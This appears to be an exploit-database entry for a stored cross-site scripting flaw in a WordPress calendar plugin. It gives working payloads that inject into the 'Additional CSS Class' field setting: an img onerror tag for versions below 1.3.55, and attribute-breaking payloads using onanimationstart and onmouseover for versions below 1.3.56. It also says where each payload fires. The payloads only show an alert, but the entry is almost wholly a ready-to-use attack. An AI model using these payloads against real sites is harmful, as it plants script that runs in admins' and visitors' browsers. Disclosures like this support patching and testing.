## https://sploitus.com/exploit?id=WPEX-ID:ED162CCC-88E6-41E8-B24D-1B9F77A038B6
Create/edit a calendar, and put the following payload in the "Additional CSS Class" settings of a field:
v < 1.3.55: "><img src=x onerror=alert(/XSS/)><"
v < 1.3.56: backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//, frontend: " style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//
The XSS will be triggered in the post/page where the Calendar is embed, as well when accessing the field settings when editing the calendar